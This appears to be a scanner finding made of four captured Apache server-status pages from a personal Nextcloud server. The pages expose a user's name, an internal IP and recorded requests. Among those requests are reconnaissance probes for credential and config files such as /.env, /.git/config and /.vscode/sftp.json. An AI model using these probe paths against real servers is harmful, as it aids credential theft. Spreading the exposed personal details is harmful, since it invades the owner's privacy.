/remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 1-14018486040/62/2931_ 12.8801994830190.00.4065.09 64.226.78.121http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-14018486040/58/2936_ 12.801015248280.00.3945.06 64.226.78.121h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-14018486040/64/2990_ 12.72101295217030.00.4066.49 64.226.78.121h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-14018486040/51/2909_ 12.6410734996990.00.7734.56 64.226.78.121h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-14018486040/63/2977_ 13.0201475094000.00.4041.57 64.226.78.121http/1.1ravignon.mycloud.paris:443GET /debug/default/view?panel=config HTTP/1.1 1-14018486040/50/2922_ 13.0401755071480.01.5960.91 64.226.78.121http/1.1ravignon.mycloud.paris:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-14018486041/58/3010W 12.80005297150.00.4058.00 64.226.78.121http/1.1ravignon.mycloud.paris:443GET /server-status HTTP/1.1 1-14018486040/51/2852_ 12.4610644728840.00.8346.82 64.226.78.121h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-14018486040/60/2927_ 13.0201924996000.00.5453.53 64.226.78.121http/1.1ravignon.mycloud.paris:443GET /v2/_catalog HTTP/1.1 1-14018486040/55/2866_ 12.6410667920200.00.4650.99 64.226.78.121h
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31933c4805933c480596bc5594
Apache Status Apache Server Status for ravignon.mycloud.paris (via 192.168.145.253) Server Version: Apache/2.4.52 (Ubuntu) OpenSSL/3.0.2 Server MPM: event Server Built: 2023-10-26T13:44:44 Current Time: Thursday, 21-Mar-2024 13:52:31 UTC Restart Time: Friday, 24-Nov-2023 06:59:39 UTC Parent Server Config. Generation: 121 Parent Server MPM Generation: 120 Server uptime: 118 days 6 hours 52 minutes 52 seconds Server load: 0.00 0.00 0.00 Total accesses: 189229 - Total Traffic: 3.9 GB - Total Duration: 35016359 CPU Usage: u367.15 s698.45 cu1463.41 cs460.26 - .0292% CPU load .0185 requests/sec - 409 B/second - 21.6 kB/request - 185.048 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 11762582no1yes124000 31762581no0yes025000 Sum201 149000 .........................________W________________.............. ..........._________________________............................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-118-0/0/1789. 0.0013634723251390.00.0031.09 54.37.79.75http/1.1localhost:80GET /.env HTTP/1.1 0-118-0/0/1743. 0.001363471373200290.00.0030.62 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 0-118-0/0/1810. 0.001363471633452090.00.0036.45 107.170.235.19http/1.1 0-118-0/0/1784. 0.001363471423385940.00.0024.31 107.170.235.19h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-118-0/0/1801. 0.001363471903434740.00.0045.43 96.126.98.148http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 0-118-0/0/1815. 0.0013634713443250.00.0051.81 54.37.79.75http/1.1localhost:80POST / HTTP/1.1 0-118-0/0/1770. 0.00136347603149460.00.0020.60 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 0-118-0/0/1821. 0.0013634713331680.00.0044.37 156.146.55.177http/1.1localhost:80GET / HTTP/1.1 0-118-0/0/1744. 0.001363471843233340.00.0035.82 96.126.98.148http/1.1 0-118-0/0/1820. 0.0013634723449280.00.0051.56 213.32.122.81http/1.1localhost:80GET / HTTP/1.1 0-118-0/0/1802. 0.0013634713319210.00.0029.17 107.170.235.19h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-118-0/0/1793. 0.001363471903284980.00.0037.56 107.170.235.19http/1.1 0-118-0/0/1793. 0.001363472153592390.00.0034.86 45.142.182.92http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 0-118-0/0/1774. 0.00136347663531870.00.0031.57 31.13.213.232h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-118-0/0/1802. 0.00136347513333060.00.0012.96 107.170.235.19h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-118-0/0/1822. 0.001363471953436430.00.0043.32 107.170.235.19http/1.1 0-118-0/0/1736. 0.00136347613308730.00.0044.35 107.170.235.19h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-118-0/0/1782. 0.001363471303183940.00.0028.64 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 0-118-0/0/1747. 0.0013634713212400.00.0031.03 107.170.235.19http/1.1 0-118-0/0/1731. 0.0013634733466320.00.0039.26 146.19.24.28http/1.1localhost:80GET / HTTP/1.1 0-118-0/0/1776. 0.001363471893225880.00.0030.94 107.170.235.19http/1.1 0-118-0/0/1774. 0.001363471173351980.00.0024.39 54.37.79.75http/1.1 0-118-0/0/1745. 0.00136347693302240.00.0033.46 5.188.108.134h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-118-0/0/1774. 0.001363471453206100.00.0029.56 54.37.79.75http/1.1 0-118-0/0/1800. 0.001363472993510880.00.0062.25 83.97.73.245http/1.1ravignon.mycloud.paris:443GET /actuator/gateway/routes HTTP/1.1 1-12017625820/39/2262_ 9.330614021150.00.2046.57 64.227.70.2http/1.1ravignon.mycloud.paris:443GET /.vscode/sftp.json HTTP/1.1 1-12017625820/56/2281_ 8.762714135500.00.3561.95 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 1-12017625820/33/2241_ 8.850953752810.00.1833.45 64.227.70.2h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-12017625820/47/2336_ 9.2621384109420.00.2725.80 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 1-12017625820/46/2279_ 9.350644237710.00.2745.71 64.227.70.2http/1.1ravignon.mycloud.paris:443GET /debug/default/view?panel=config HTTP/1.1 1-12017625820/44/2243_ 9.270814158610.00.2248.87 64.227.70.2http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-12017625820/45/2302_ 8.91212274024620.00.2533.52 64.227.70.2h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-12017625820/60/2292_ 9.3501413952600.00.3656.54 64.227.70.2http/1.1ravignon.mycloud.paris:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-12017625821/49/2302W 9.06003987730.00.2740.17 64.227.70.2http/1.1ravignon.mycloud.paris:443GET /server-status HTTP/1.1 1-12017625820/47/2279_ 9.2321674200750.00.2727.97 64.227.70.2h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-12017625820/49/2280_ 9.14211073733740.00.2753.06 64.227.70.2http/1.1 1-12017625820/56/2274_ 9.22211364140250.00.3240.82 64.227.70.2http/1.1 1-12017625820/53/2257_ 8.6821824025990.00.3061.32 64.227.70.2http/1.1 1-12017625820/43/2239_ 8.720753970370.00.2422.10 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 1-12017625820/41/2257_ 9.3271123902550.00.2133.67 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 1-12017625820/49/2273_ 9.327894042870.00.2748.57 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 1-12017625820/46/2297_ 9.092904041770.00.2449.98 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 1-12017625820/40/2196_ 9.2321903738910.00.2041.83 64.227.70.2http/1.1 1-12017625820/46/2226_ 9.2622193857880.00.2536.18 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 1-12017625820/53/2198_ 9.18212016805630.00.3043.16 64.227.70.2h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-12017625820/51/2285_ 9.2001004004100.00.2858.53 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 1-12017625820/47/2214_ 9.2321834077610.00.2644.74 64.227.70.2http/1.1 1-12017625820/37/2275_ 9.1006443893470.00.1949.42 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 1-12017625820/54/2264_ 9.340614353110.00.2928.47 64.227.70.2http/1.1ravignon.mycloud.paris:4
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31933c4805933c4805f4e23e5c
Apache Status Apache Server Status for ravignon.mycloud.paris (via 192.168.145.253) Server Version: Apache/2.4.52 (Ubuntu) OpenSSL/3.0.2 Server MPM: event Server Built: 2023-10-26T13:44:44 Current Time: Friday, 02-Feb-2024 14:46:44 UTC Restart Time: Friday, 24-Nov-2023 06:59:39 UTC Parent Server Config. Generation: 73 Parent Server MPM Generation: 72 Server uptime: 70 days 7 hours 47 minutes 4 seconds Server load: 0.00 0.00 0.00 Total accesses: 116057 - Total Traffic: 2.4 GB - Total Duration: 21579647 CPU Usage: u228.1 s424.27 cu894.11 cs277.3 - .03% CPU load .0191 requests/sec - 418 B/second - 21.4 kB/request - 185.94 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 11559558no0yes025000 31559559no0yes124000 Sum200 149000 ........................._________________________.............. ..........._W_______________________............................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-68-0/0/1289. 0.0031240002335110.00.0026.81 101.36.108.9http/1.1localhost:80GET /axis2/axis2-admin/ HTTP/1.1 0-68-0/0/1232. 0.003124001582369580.00.0023.14 212.102.40.218h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-68-0/0/1251. 0.003124001232444460.00.0031.15 212.102.40.218http/1.1 0-68-0/0/1260. 0.003124001972486470.00.0020.71 212.102.40.218h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-68-0/0/1282. 0.00312400112508510.00.0028.76 212.102.40.218http/1.1 0-68-0/0/1276. 0.003124001492427570.00.0047.99 212.102.40.218h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-68-0/0/1264. 0.003124001552372370.00.0016.83 212.102.40.218http/1.1 0-68-0/0/1261. 0.0031240032381510.00.0025.06 78.153.140.175http/1.1 0-68-0/0/1209. 0.003124001672331790.00.0031.96 91.92.249.130http/1.1ravignon.mycloud.paris:443GET /global-protect/login.esp HTTP/1.1 0-68-0/0/1275. 0.0031240022463310.00.0044.97 141.98.11.201http/1.1localhost:80GET / HTTP/1.1 0-68-0/0/1261. 0.003124001372318440.00.0024.48 91.92.250.119http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 0-68-0/0/1263. 0.003124001842311610.00.0030.94 3.68.85.234http/1.1 0-68-0/0/1279. 0.003124001502652140.00.0031.47 94.102.61.75http/1.1 0-68-0/0/1263. 0.003124002642618830.00.0025.81 185.141.119.49http/1.1 0-68-0/0/1281. 0.003124001602558760.00.008.02 3.68.85.234http/1.1 0-68-0/0/1293. 0.0031240002523770.00.0033.50 159.65.50.152http/1.1 0-68-0/0/1208. 0.003124001502397690.00.0034.19 120.157.32.65http/1.1 0-68-0/0/1247. 0.0031240002233670.00.0017.55 54.36.115.221http/1.1 0-68-0/0/1228. 0.003124001442359600.00.0022.72 185.141.119.49http/1.1 0-68-0/0/1241. 0.0031240012551850.00.0032.96 54.36.115.221http/1.1localhost:80GET /.env HTTP/1.1 0-68-0/0/1256. 0.003124001832360830.00.0027.84 185.76.0.103http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 0-68-0/0/1219. 0.0031240002345530.00.0015.82 101.36.108.9http/1.1localhost:80GET /axis2/ HTTP/1.1 0-68-0/0/1230. 0.0031240032429650.00.0028.06 213.32.122.81http/1.1localhost:80GET / HTTP/1.1 0-68-0/0/1261. 0.003124001782274230.00.0024.64 212.102.40.218http/1.1 0-68-0/0/1249. 0.003124001982451410.00.0054.21 212.102.40.218h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-7215595580/35/1370_ 6.6601562412150.00.2416.36 164.92.192.25http/1.1ravignon.mycloud.paris:443GET /v2/_catalog HTTP/1.1 1-7215595580/32/1375_ 6.3901682511520.00.2024.99 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 1-7215595580/24/1342_ 6.211632253580.00.1610.04 164.92.192.25h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-7215595580/33/1438_ 6.6501582525550.00.2215.14 164.92.192.25http/1.1ravignon.mycloud.paris:443GET /about HTTP/1.1 1-7215595580/24/1379_ 6.5129192022628320.00.1529.77 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 1-7215595580/32/1342_ 6.4811962639090.00.1719.25 164.92.192.25h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-7215595580/30/1399_ 6.47163662538160.00.2620.31 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 1-7215595580/23/1362_ 6.452914612311830.00.1311.01 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 1-7215595580/25/1337_ 6.201334802280050.00.1812.87 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 1-7215595580/25/1354_ 6.211742644120.00.1616.39 164.92.192.25h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-7215595580/30/1372_ 6.5616332196090.00.2116.26 43.134.66.205http/1.1localhost:80GET / HTTP/1.1 1-7215595580/27/1346_ 6.6411782364250.00.1811.29 164.92.192.25http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-7215595580/27/1338_ 6.5011252444810.00.1320.92 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 1-7215595580/22/1355_ 6.0929661042436620.00.1413.49 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 1-7215595580/27/1342_ 6.462875602358840.00.1614.69 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 1-7215595580/33/1360_ 6.440642416530.00.2319.63 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 1-7215595580/26/1386_ 6.56132322312010.00.1425.07 54.37.79.75http/1.1localhost:80POST / HTTP/1.1 1-7215595580/25/1328_ 6.271323582303180.00.1623.02 54.37.79.75http/1.1 1-7215595580/27/1299_ 6.361612307660.00.1914.47 164.92.192.25h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-7215595580/28/1308_ 6.182914652327110.00.2112.95 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 1-7215595580/24/1319_ 6.5513372672306920.00.1810.19 83.97.73.245http/1.1ravignon.mycloud.paris:443GET /actuator/gateway/routes HTTP/1.1 1-7215595580/23/1311_ 6.53288010432445150.00.1714.69 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 1-7215595580/32/1388_ 6.4628751092418080.00.2527.96 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 1-7215595580/25/1328_ 6.481722540870.00.1716.53 164.92.192.25http/1.1 1-7215595580/22/1366_ 6.4317424589
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31933c4805933c48051c1a68a2
Apache Status Apache Server Status for ravignon.mycloud.paris (via 192.168.145.253) Server Version: Apache/2.4.52 (Ubuntu) OpenSSL/3.0.2 Server MPM: event Server Built: 2023-10-26T13:44:44 Current Time: Sunday, 07-Jan-2024 04:49:39 UTC Restart Time: Friday, 24-Nov-2023 06:59:39 UTC Parent Server Config. Generation: 47 Parent Server MPM Generation: 46 Server uptime: 43 days 21 hours 49 minutes 59 seconds Server load: 0.00 0.00 0.00 Total accesses: 61489 - Total Traffic: 734.6 MB - Total Duration: 11185928 CPU Usage: u135.45 s263.52 cu474.93 cs143.87 - .0268% CPU load .0162 requests/sec - 203 B/second - 12.2 kB/request - 181.918 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 11447608no0yes124000 31447609no0yes025000 Sum200 149000 ........................._W_______________________.............. ..........._________________________............................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-36-0/0/968. 0.0079497601704620.00.008.79 198.199.111.177h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-36-0/0/899. 0.007949763641679940.00.007.68 54.183.116.224http/1.1ravignon.mycloud.paris:443GET /core/img/manifest.js HTTP/1.1 0-36-0/0/939. 0.0079497621849100.00.006.09 185.216.71.4http/1.1localhost:80CONNECT pro.ip-api.com:443 HTTP/1.1 0-36-0/0/938. 0.0079497641878200.00.006.03 54.183.116.224http/1.1ravignon.mycloud.paris:443GET /dist/core-files_client.js HTTP/1.1 0-36-0/0/964. 0.0079497641903670.00.006.69 170.64.204.203http/1.1localhost:80GET /info.php HTTP/1.1 0-36-0/0/934. 0.0079497601701640.00.0023.72 170.64.204.203http/1.1localhost:80GET /geoip/ HTTP/1.1 0-36-0/0/946. 0.0079497631673100.00.005.85 95.214.24.35http/1.1localhost:80GET /xmlrpc.php?rsd HTTP/1.1 0-36-0/0/950. 0.0079497621765920.00.0015.47 54.36.115.221http/1.1localhost:80POST / HTTP/1.1 0-36-0/0/907. 0.0079497601723170.00.007.14 54.36.115.221http/1.1 0-36-0/0/956. 0.0079497601839930.00.006.62 141.98.7.187http/1.1localhost:80POST /boaform/admin/formLogin HTTP/1.1 0-36-0/0/937. 0.0079497641739620.00.0012.73 185.180.143.79http/1.1localhost:80GET / HTTP/1.1 0-36-0/0/943. 0.0079497641770990.00.0011.10 141.98.7.187http/1.1 0-36-0/0/964. 0.0079497601968710.00.008.95 170.64.204.203http/1.1localhost:80GET /bundle.js HTTP/1.1 0-36-0/0/952. 0.0079497601979940.00.006.13 170.64.204.203http/1.1localhost:80GET /files/ HTTP/1.1 0-36-0/0/970. 0.0079497601977910.00.005.99 170.64.204.203http/1.1 0-36-0/0/995. 0.0079497601971530.00.0023.09 170.64.204.203http/1.1localhost:80GET /systembc/password.php HTTP/1.1 0-36-0/0/890. 0.007949762851746420.00.005.76 170.64.204.203http/1.1 0-36-0/0/941. 0.0079497611669850.00.008.66 162.243.128.30http/1.1 0-36-0/0/913. 0.0079497611702510.00.0016.88 170.64.204.203http/1.1 0-36-0/0/932. 0.0079497601889890.00.0020.95 170.64.204.203http/1.1 0-36-0/0/922. 0.007949761501704850.00.0018.05 34.140.248.32http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 0-36-0/0/931. 0.0079497611764620.00.006.47 162.243.128.30http/1.1localhost:80GET /actuator/health HTTP/1.1 0-36-0/0/921. 0.0079497641819150.00.0015.66 54.36.115.221http/1.1 0-36-0/0/952. 0.0079497621683780.00.006.80 54.183.116.224http/1.1ravignon.mycloud.paris:443GET /dist/core-files_fileinfo.js HTTP/1.1 0-36-0/0/938. 0.00794976741769850.00.005.88 185.216.71.4http/1.1 1-4614476080/1/623_ 0.46334305957100.00.026.83 167.172.240.54http/1.1 1-4614476081/2/608W 0.61001046490.00.0214.39 138.197.88.136http/1.1ravignon.mycloud.paris:443GET /server-status HTTP/1.1 1-4614476080/2/610_ 0.371228956100.00.054.22 212.102.40.218http/1.1 1-4614476080/1/658_ 0.473342071047630.00.028.34 167.172.240.54http/1.1 1-4614476080/1/610_ 0.34231124510.00.0123.82 138.197.88.136http/1.1 1-4614476080/2/588_ 0.9201621004390.00.023.90 138.197.88.136http/1.1ravignon.mycloud.paris:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-4614476080/2/591_ 0.43021022530.00.0311.11 167.172.240.54http/1.1 1-4614476080/1/597_ 0.3232854600.00.003.86 138.197.88.136h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-4614476080/2/600_ 0.633335929450.00.027.46 138.197.88.136http/1.1 1-4614476080/1/583_ 0.323331231052360.00.029.78 167.172.240.54http/1.1 1-4614476080/3/629_ 0.814222896690.00.0110.27 138.197.88.136http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-4614476080/3/618_ 0.63411026430.00.035.49 138.197.88.136h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-4614476080/2/568_ 0.6233489894780.00.028.64 167.172.240.54h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-4614476080/3/612_ 0.881167912440.00.017.80 138.197.88.136http/1.1ravignon.mycloud.paris:443GET /.vscode/sftp.json HTTP/1.1 1-4614476080/3/592_ 0.872203937620.00.058.79 138.197.88.136http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-4614476080/1/619_ 0.3432581025220.00.0214.14 138.197.88.136http/1.1 1-4614476080/1/618_ 0.3240891430.00.0012.46 57.129.23.166http/1.1 1-4614476080/2/594_ 0.653274935820.00.0217.42 138.197.88.136http/1.1 1-4614476080/2/572_ 0.3912091011740.00.043.70 212.102.40.218h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-4614476080/3/566_ 0.891145849150.00.026.73 138.197.88.136http/1.1ravignon.mycloud.paris:443GET /about HTTP/1.1 1-4614476080/1/595_ 0.352130879800.00.004.82 212.102.40.218h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-4614476080/3/560_ 0.901164957680.00.035.16 138.197.88.136http/1.1ravignon.mycloud.paris:443GET /debug/default/view?panel=config HTTP/1.1 1-4614476080/0/618_ 0.0002641003350.00.0014.97 212.102.40.218h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-4614476080/3/588_ 0.9001371011050.00.0311.08 138.197.88.136http/1.1ravignon.mycloud.paris:443GET /v2/_catalog HTTP/1.1 1-4614476080/1/626_ 0.0902551053420.00.027.00 167.172.240.54h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 2-36-0/0/265. 0.00794976288465870.00.002.01 159.203.208.23http/1.1 2-36-0/0/281. 0.007949760618630.00.004.64 209.97.176.222http/1.1 2-36-0/0/270. 0.0079497604
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31933c4805933c48050b1b9928
Apache Status Apache Server Status for ravignon.mycloud.paris (via 192.168.145.253) Server Version: Apache/2.4.52 (Ubuntu) OpenSSL/3.0.2 Server MPM: event Server Built: 2023-10-26T13:44:44 Current Time: Friday, 05-Jan-2024 16:36:39 UTC Restart Time: Friday, 24-Nov-2023 06:59:39 UTC Parent Server Config. Generation: 45 Parent Server MPM Generation: 44 Server uptime: 42 days 9 hours 37 minutes Server load: 0.00 0.00 0.00 Total accesses: 60756 - Total Traffic: 729.1 MB - Total Duration: 11127348 CPU Usage: u136.21 s256.79 cu464.06 cs139.37 - .0272% CPU load .0166 requests/sec - 208 B/second - 12.3 kB/request - 183.148 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 11439161no0yes025000 31439162no1yes124000 Sum201 149000 ........................._________________________.............. ...........______________W__________............................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-36-0/0/968. 0.0066459601704620.00.008.79 198.199.111.177h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-36-0/0/899. 0.006645963641679940.00.007.68 54.183.116.224http/1.1ravignon.mycloud.paris:443GET /core/img/manifest.js HTTP/1.1 0-36-0/0/939. 0.0066459621849100.00.006.09 185.216.71.4http/1.1localhost:80CONNECT pro.ip-api.com:443 HTTP/1.1 0-36-0/0/938. 0.0066459641878200.00.006.03 54.183.116.224http/1.1ravignon.mycloud.paris:443GET /dist/core-files_client.js HTTP/1.1 0-36-0/0/964. 0.0066459641903670.00.006.69 170.64.204.203http/1.1localhost:80GET /info.php HTTP/1.1 0-36-0/0/934. 0.0066459601701640.00.0023.72 170.64.204.203http/1.1localhost:80GET /geoip/ HTTP/1.1 0-36-0/0/946. 0.0066459631673100.00.005.85 95.214.24.35http/1.1localhost:80GET /xmlrpc.php?rsd HTTP/1.1 0-36-0/0/950. 0.0066459621765920.00.0015.47 54.36.115.221http/1.1localhost:80POST / HTTP/1.1 0-36-0/0/907. 0.0066459601723170.00.007.14 54.36.115.221http/1.1 0-36-0/0/956. 0.0066459601839930.00.006.62 141.98.7.187http/1.1localhost:80POST /boaform/admin/formLogin HTTP/1.1 0-36-0/0/937. 0.0066459641739620.00.0012.73 185.180.143.79http/1.1localhost:80GET / HTTP/1.1 0-36-0/0/943. 0.0066459641770990.00.0011.10 141.98.7.187http/1.1 0-36-0/0/964. 0.0066459601968710.00.008.95 170.64.204.203http/1.1localhost:80GET /bundle.js HTTP/1.1 0-36-0/0/952. 0.0066459601979940.00.006.13 170.64.204.203http/1.1localhost:80GET /files/ HTTP/1.1 0-36-0/0/970. 0.0066459601977910.00.005.99 170.64.204.203http/1.1 0-36-0/0/995. 0.0066459601971530.00.0023.09 170.64.204.203http/1.1localhost:80GET /systembc/password.php HTTP/1.1 0-36-0/0/890. 0.006645962851746420.00.005.76 170.64.204.203http/1.1 0-36-0/0/941. 0.0066459611669850.00.008.66 162.243.128.30http/1.1 0-36-0/0/913. 0.0066459611702510.00.0016.88 170.64.204.203http/1.1 0-36-0/0/932. 0.0066459601889890.00.0020.95 170.64.204.203http/1.1 0-36-0/0/922. 0.006645961501704850.00.0018.05 34.140.248.32http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 0-36-0/0/931. 0.0066459611764620.00.006.47 162.243.128.30http/1.1localhost:80GET /actuator/health HTTP/1.1 0-36-0/0/921. 0.0066459641819150.00.0015.66 54.36.115.221http/1.1 0-36-0/0/952. 0.0066459621683780.00.006.80 54.183.116.224http/1.1ravignon.mycloud.paris:443GET /dist/core-files_fileinfo.js HTTP/1.1 0-36-0/0/938. 0.00664596741769850.00.005.88 185.216.71.4http/1.1 1-4414391610/4/607_ 0.44922947950.00.056.73 34.234.87.0http/1.1 1-4414391610/5/593_ 0.69310711041390.00.0514.31 161.35.27.144h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-4414391610/3/598_ 0.750188950460.00.034.13 89.95.112.211http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 1-4414391610/5/646_ 1.1001451041580.00.048.26 161.35.27.144http/1.1ravignon.mycloud.paris:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-4414391610/3/597_ 0.8612321117220.00.0323.73 89.95.112.211http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 1-4414391610/3/577_ 0.942135993500.00.043.84 161.35.27.144h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-4414391610/7/577_ 0.8621631012120.00.0511.03 161.35.27.144http/1.1 1-4414391610/4/586_ 1.101149850730.00.023.79 161.35.27.144http/1.1ravignon.mycloud.paris:443GET /.vscode/sftp.json HTTP/1.1 1-4414391610/2/588_ 0.582178918060.00.027.39 161.35.27.144h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-4414391610/4/572_ 0.81210871034890.00.029.74 161.35.27.144http/1.1 1-4414391610/1/617_ 0.529258888700.00.0210.20 138.68.163.10http/1.1ravignon.mycloud.paris:443GET /.git/config HTTP/1.1 1-4414391610/5/605_ 0.501511501018650.00.085.40 198.20.87.98http/1.1 1-4414391610/6/555_ 0.77122169888970.00.088.54 89.95.112.211http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 1-4414391610/3/599_ 0.9232193901340.00.027.76 89.95.112.211http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 1-4414391610/4/578_ 